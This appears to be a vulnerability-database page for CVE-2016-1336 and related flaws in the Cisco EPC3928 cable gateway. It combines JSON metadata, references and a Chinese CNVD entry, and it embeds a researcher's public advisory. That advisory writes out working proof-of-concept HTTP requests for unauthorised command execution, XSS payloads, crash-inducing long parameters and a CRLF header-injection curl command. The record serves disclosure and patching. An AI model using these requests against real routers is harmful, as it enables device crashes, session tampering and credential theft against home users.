    "data": "goform/Docsis_system on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long LanguageSelect parameter, related to a \"Gateway HTTP Corruption Denial of Service\" issue, aka Bug ID CSCuy28100. The CiscoEPC3928 is a wireless router product from Cisco. A security vulnerability exists in goform/Docsis_system on the Cisco EPC3928. Cisco Wireless Residential Gateway is prone to a denial-of-service vulnerability. \nThis issue is being tracked by Cisco Bug ID CSCuy28100. # Title: Cisco EPC 3928 Multiple Vulnerabilities\n# Vendor: http://www.cisco.com/\n# Vulnerable Version(s): Cisco Model EPC3928 DOCSIS 3.0 8x4 Wireless Residential Gateway\n# CVE References: CVE-2015-6401 / CVE-2015-6402 / CVE-2016-1328 / CVE-2016-1336 / CVE-2016-1337\n# Author: Patryk Bogdan from Secorda security team (http://secorda.com/)\n\n========\n\nSummary:\nIn recent security research, Secorda security team has found multiple vulnerabilities affecting Cisco EPC3928 Wireless Residential Gateway. Variants of this product can also be affected. \nUsing combination of several vulnerabilities, attacker is able to remotely download and decode boot configuration file, which you can see on PoC video below. The attacker is also able to reconfigure device in order to perform attacks on the home-user, inject additional data to modem http response or extract sensitive informations from the device, such as the Wi-Fi key. \n\nUntil Cisco releases workarounds or patches, we recommend verify access to the web-based management panel and make sure that it is not reachable from the external network. \n\nVulnerabilities:\n1) Unauthorized Command Execution\n2) Gateway Stored XSS\n3) Gateway Client List DoS\n4) Gateway Reflective XSS\n5) Gateway HTTP Corruption DoS\n6) \"Stored\" HTTP Response Injection\n7) Boot Information Disclosure\n\n========\n\nPoC:\n\n- Unathorized Command Execution\n\n#1 - Channel selection request:\nPOST /goform/ChannelsSelection HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/ChannelsSelection.asp\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 24\n\nSAHappyUpstreamChannel=3\n\n#1 - Response:\nHTTP/1.0 200 OK\nServer: PS HTTP Server\nContent-type: text/html\nConnection: close\n\n\u003chtml lang=\"en\"\u003e\u003chead\u003e\u003ctitle\u003eRELOAD\u003c/title\u003e\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" /\u003e\u003cscript language=\"javascript\" type=\"text/javascript\" src=\"../active.js\"\u003e\u003c/script\u003e\u003cscript language=\"javascript\" type=\"text/javascript\" src=\"../lang.js\"\u003e\u003c/script\u003e\u003cscript language=\"javascript\" type=\"text/javascript\"\u003evar totaltime=120;function time(){document.formnow.hh.value=(\" \"+totaltime+\" Seconds \");totaltime--;} function refreshStatus(){window.setTimeout(\"window.parent.location.href=\u0027http://192.168.1.1\u0027\",totaltime*1000);}mytime=setInterval(\u0027time()\u0027,1000);\u003c/script\u003e\u003c/head\u003e\u003cbody BGCOLOR=\"#CCCCCC\" TEXT=black\u003e\u003cform name=\"formnow\"\u003e\u003cHR\u003e\u003ch1\u003e\u003cscript language=\"javascript\" type=\"text/javascript\"\u003edw(msg_goform34);\u003c/script\u003e\u003ca href=\"http://192.168.1.1/index.asp\"\u003e\u003cscript language=\"javascript\" type=\"text/javascript\"\u003edw(msg_goform35);\u003c/script\u003e\u003c/a\u003e\u003cscript language=\"javascript\"\u003erefreshStatus();\u003c/script\u003e\u003cinput type=\"text\" name=\"hh\" style=\"background-color:#CCCCCC;font-size:36;border:n\n one\"\u003e\u003c/h1\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e\n\n#2 - Clear logs request:\nPOST /goform/Docsis_log HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/Docsis_log.asp\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 41\n\nBtnClearLog=Clear+Log\u0026SnmpClearEventLog=0\n\n#2 - Response:\nHTTP/1.0 302 Redirect\nServer: PS HTTP Server\nLocation: http://192.168.1.1/Docsis_log.asp\nContent-type: text/html\nConnection: close\n\n\n\n- Gateway Stored and Reflective Cross Site Scripting\n\nExample #1:\n\n#1 \\x96 Stored XSS via username change request:\nPOST /goform/Administration HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/Administration.asp\nCookie: Lang=en; SessionID=2719880\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 165\n\nworking_mode=0\u0026sysname=\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\u0026sysPasswd=home\u0026sysConfirmPasswd=home\u0026save=Save+Settings\u0026preWorkingMode=1\u0026h_wlan_enable=enable\u0026h_user_type=common\n\n#1 \\x96 Response:\nHTTP/1.0 302 Redirect\nServer: PS HTTP Server\nLocation: http://192.168.1.1/Administration.asp\nContent-type: text/html\nConnection: close\n\n\n#2 \\x96 Redirect request:\nGET /Administration.asp HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/Administration.asp\nCookie: Lang=en; SessionID=2719880\nDNT: 1\nConnection: keep-alive\n\n#2 \\x96 Response:\nHTTP/1.1 200 OK\nContent-type: text/html\nExpires: Thu, 3 Oct 1968 12:00:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nConnection: close\nContent-Length: 15832\n\n\u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"\u003e\n\u003chtml lang=\"en\"\u003e\n\u003chead\u003e\n(...)\n\u003ctr\u003e\n\u003ctd\u003e\n\u003cscript language=\"javascript\" type=\"text/javascript\"\u003edw(usertype);\u003c/script\u003e\n\u003c/td\u003e\n\u003ctd nowrap\u003e\n\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\n\u003c/TD\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n(...)\n\n\nExample #2:\n\n#1 \\x96 Reflected XSS via client list request:\nPOST /goform/WClientMACList HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: 192.168.1.1/WClientMACList.asp\nCookie: Lang=en; SessionID=109660\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 62\n\nsortWireless=mac\u0026h_sortWireless=mac\" onmouseover=alert(1) x=\"y\n\n#1 \\x96 Response:\nHTTP/1.0 302 Redirect\nServer: PS HTTP Server\nLocation: 192.168.1.1/WClientMACList.asp\nContent-type: text/html\nConnection: close\n#2 \\x96 Redirect request:\nGET /WClientMACList.asp HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: 192.168.1.1/WClientMACList.asp\nCookie: Lang=en; SessionID=109660\nConnection: keep-alive\n\n#2 \\x96 Reponse:\nHTTP/1.1 200 OK\nContent-type: text/html\nExpires: Thu, 3 Oct 1968 12:00:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nConnection: close\nContent-Length: 7385\n\n\u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"\u003e\n\u003chtml lang=\"en\"\u003e\n\u003chead\u003e\n(...)\n\u003c/table\u003e\n\u003c/div\u003e\n\u003cinput type=\"hidden\" name=\"h_sortWireless\" value=\"mac\" onmouseover=alert(1) x=\"y\" /\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n(...)\n\n\n\n- Gateway Client List Denial of Service\n\nDevice will crash after sending following request. \n\n# HTTP Request\nPOST /goform/WClientMACList HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/WClientMACList.asp\nCookie: Lang=en; SessionID=109660\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 62\n\nsortWireless=mac\u0026h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n\n\n\n- Gateway HTTP Corruption Denial of Service\n\nDevice will crash after sending following request. \n\n# HTTP Request\nPOST /goform/Docsis_system HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/Docsis_system.asp\nCookie: Lang=en; SessionID=348080\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 106\n\nusername_login=\u0026password_login=\u0026LanguageSelect=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\u0026Language_Submit=0\u0026login=Log+In\n\n\n\n- \"Stored\" HTTP Response Injection\n\nIt is able to inject additional HTTP data to response, if string parameter of LanguageSelect won\u0027t be too long (in that case device will crash). \nAdditional data will be stored in device memory and returned with every http response on port 80 until reboot. \n\ndevil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10\nHTTP/1.1 200 OK\nContent-type: text/html\nExpires: Thu, 3 Oct 1968 12:00:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nConnection: close\nContent-Length: 1469\n\n\u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"\u003e\n\u003chtml lang=\"en\"\u003e\n\ndevil@hell:~$ curl --data \"username_login=\u0026password_login=\u0026LanguageSelect=en%0d%0aSet-Cookie: w00t\u0026Language_Submit=0\u0026login=Log+In\" http://192.168.1.1/goform/Docsis_system -s \u003e /dev/null\n\ndevil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10\nHTTP/1.1 200 OK\nContent-type: text/html\nExpires: Thu, 3 Oct 1968 12:00:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nConnection: close\nSet-Cookie: Lang=en\nSet-Cookie: w00t\nSet-Cookie: SessionID=657670\nContent-Length: 1469\n\n\n\n- Boot Information Disclosure\n\nIn early booting phase, for a short period of time some administrator functions can be executed, and it is able to extract device configuration file. We wrote an exploit that crash the modem, and then retrieve and decode config in order to obtain users credentials. \n\nExploit video PoC: https://www.youtube.com/watch?v=PHSx0s7Turo\n\n\n========\n\nCVE References:\nCVE-2015-6401\nCVE-2015-6402\nCVE-2016-1328\nCVE-2016-1336\nCVE-2016-1337\n\nCisco Bug ID\\x92s:\nCSCux24935\nCSCux24938\nCSCux24941\nCSCux24948\nCSCuy28100\nCSCux17178\n\nRead more on our blog:\nhttp://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-1336"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003415"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-04561"
      },
      {
        "db": "BID",
        "id": "91543"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90155"
      },
      {
        "db": "PACKETSTORM",
        "id": "137379"
      }
    ],
    "trust": 2.61
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-90155",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-90155"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-1336",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "91543",
        "trust": 1.4
      },
      {
        "db": "EXPLOIT-DB",
        "id": "39904",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003415",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-295",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "137379",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-04561",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-90155",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04561"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90155"
      },
      {
        "db": "BID",
        "id": "91543"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003415"
      },
      {
        "db": "PACKETSTORM",
        "id": "137379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-295"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1336"
      }
    ]
  },
  "id": "VAR-201607-0004",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04561"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90155"
      }
    ],
    "trust": 1.325
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04561"
      }
    ]
  },
  "last_update_date": "2025-04-13T23:17:53.834000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Cisco Model DPC3928/EPC3928 DOCSIS/EuroDOCSIS 3.0 8x4 Wireless Residential Gateway with Embedded Digital Voice Adapter User Guide",
        "trust": 0.8,
        "url": "http://www.cisco.com/c/dam/en/us/td/docs/video/at_home/Cable_Modems/3900_Series/OL-29161-01.pdf"
      },
      {
        "title": "CiscoEPC3928 Patch for Denial of Service Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/78582"
      },
      {
        "title": "Cisco EPC3928 Remediation measures for denial of service vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=62593"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04561"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003415"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-295"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-90155"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003415"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1336"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.9,
        "url": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/"
      },
      {
        "trust": 2.3,
        "url": "http://www.securityfocus.com/archive/1/archive/1/538627/100/0/threaded"
      },
      {
        "trust": 1.4,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1336"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/bid/91543"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/archive/1/538627/100/0/threaded"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/39904/"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1336"
      },
      {
        "trust": 0.6,
        "url": "http://packetstormsecurity.com/files/137379/cisco-epc-3928-xss-dos-command-execution.html"
      },
      {
        "trust": 0.4,
        "url": "http://www.cisco.com/"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/index.asp\"\u003e\u003cscript"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/administration.asp"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1336"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1337"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/docsis_system.asp"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/goform/docsis_system"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6401"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/channelsselection.asp"
      },
      {
        "trust": 0.1,
        "url": "https://www.youtube.com/watch?v=phsx0s7turo"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6402"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/docsis_log.asp"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/wclientmaclist.asp"
      },
      {
        "trust": 0.1,
        "url": "http://secorda.com/)"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1328"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1\u0027\",totaltime*1000);}mytime=setinterval(\u0027time()\u0027,1000);\u003c/script\u003e\u003c/head\u003e\u003cbody"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04561"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90155"
      },
      {
        "db": "BID",
        "id": "91543"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003415"
      },
      {
        "db": "PACKETSTORM",
        "id": "137379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-295"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1336"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04561"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90155"
      },
      {
        "db": "BID",
        "id": "91543"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003415"
      },
      {
        "db": "PACKETSTORM",
        "id": "137379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-295"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1336"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-07-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-04561"
      },
      {
        "date": "2016-07-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-90155"
      },
      {
        "date": "2016-07-03T00:00:00",
        "db": "BID",
        "id": "91543"
      },
      {
        "date": "2016-07-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-003415"
      },
      {
        "date": "2016-06-08T13:22:22",
        "db": "PACKETSTORM",
        "id": "137379"
      },
      {
        "date": "2016-06-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201606-295"
      },
      {
        "date": "2016-07-03T21:59:05.633000",
        "db": "NVD",
        "id": "CVE-2016-1336"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-07-06T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-04561"
      },
      {
        "date": "2018-10-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-90155"
      },
      {
        "date": "2016-07-03T00:00:00",
        "db": "BID",
        "id": "91543"
      },
      {
        "date": "2016-07-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-003415"
      },
      {
        "date": "2016-07-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201606-295"
      },
      {
        "date": "2025-04-12T10:46:40.837000",
        "db": "NVD",
        "id": "CVE-2016-1336"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-295"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cisco EPC3928 Denial of Service Vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04561"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-295"
      }
    ],
    "trust": 1.2
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-295"
      }
    ],
    "trust": 0.6
  }
}

CNVD-2016-04561

Vulnerability from cnvd - Published: 2016-07-06

Title

Cisco EPC3928拒绝服务漏洞

Description

Cisco EPC3928是美国思科（Cisco）公司的一款无线路由器产品。 Cisco EPC3928上的goform/Docsis_system中存在安全漏洞。远程攻击者可借助较长的‘LanguageSelect’参数利用该漏洞造成拒绝服务（设备崩溃）。

Severity

中

Patch Name

Cisco EPC3928拒绝服务漏洞的补丁

Patch Description

Cisco EPC3928是美国思科（Cisco）公司的一款无线路由器产品。 Cisco EPC3928上的goform/Docsis_system中存在安全漏洞。远程攻击者可借助较长的‘LanguageSelect’参数利用该漏洞造成拒绝服务（设备崩溃）。目前，供应商发布了安全公告及相关补丁信息，修复了此漏洞。

Formal description

目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页： http://www.cisco.com/

Reference

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1336 http://www.securityfocus.com/archive/1/archive/1/538627/100/0/threaded

Impacted products

Name
Cisco EPC3928

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2016-1336"
    }
  },
  "description": "Cisco EPC3928\u662f\u7f8e\u56fd\u601d\u79d1\uff08Cisco\uff09\u516c\u53f8\u7684\u4e00\u6b3e\u65e0\u7ebf\u8def\u7531\u5668\u4ea7\u54c1\u3002\r\n\r\nCisco EPC3928\u4e0a\u7684goform/Docsis_system\u4e2d\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u501f\u52a9\u8f83\u957f\u7684\u2018LanguageSelect\u2019\u53c2\u6570\u5229\u7528\u8be5\u6f0f\u6d1e\u9020\u6210\u62d2\u7edd\u670d\u52a1\uff08\u8bbe\u5907\u5d29\u6e83\uff09\u3002",
  "discovererName": "Patryk Bogdan from Secorda security team",
  "formalWay": "\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6b64\u5b89\u5168\u95ee\u9898\uff0c\u8be6\u60c5\u8bf7\u5173\u6ce8\u5382\u5546\u4e3b\u9875\uff1a\r\nhttp://www.cisco.com/",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2016-04561",
  "openTime": "2016-07-06",
  "patchDescription": "Cisco EPC3928\u662f\u7f8e\u56fd\u601d\u79d1\uff08Cisco\uff09\u516c\u53f8\u7684\u4e00\u6b3e\u65e0\u7ebf\u8def\u7531\u5668\u4ea7\u54c1\u3002\r\n\r\nCisco EPC3928\u4e0a\u7684goform/Docsis_system\u4e2d\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u501f\u52a9\u8f83\u957f\u7684\u2018LanguageSelect\u2019\u53c2\u6570\u5229\u7528\u8be5\u6f0f\u6d1e\u9020\u6210\u62d2\u7edd\u670d\u52a1\uff08\u8bbe\u5907\u5d29\u6e83\uff09\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "Cisco EPC3928\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": "Cisco EPC3928"
  },
  "referenceLink": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1336\r\nhttp://www.securityfocus.com/archive/1/archive/1/538627/100/0/threaded",
  "serverity": "\u4e2d",
  "submitTime": "2016-07-05",
  "title": "Cisco EPC3928\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2016-1336 (GCVE-0-2016-1336)

GHSA-GW3H-3JRX-85FR

FKIE_CVE-2016-1336

GSD-2016-1336

VAR-201607-0004

Vendor: http://www.cisco.com/

Vulnerable Version(s): Cisco Model EPC3928 DOCSIS 3.0 8x4 Wireless Residential Gateway

CVE References: CVE-2015-6401 / CVE-2015-6402 / CVE-2016-1328 / CVE-2016-1336 / CVE-2016-1337

Author: Patryk Bogdan from Secorda security team (http://secorda.com/)

1 - Channel selection request:

1 - Response:

dw(msg_goform34);dw(msg_goform35);refreshStatus();

2 - Clear logs request:

2 - Response:

1 \x96 Stored XSS via username change request:

1 \x96 Response:

2 \x96 Redirect request:

2 \x96 Response:

CNVD-2016-04561

Tags

Sightings

Nomenclature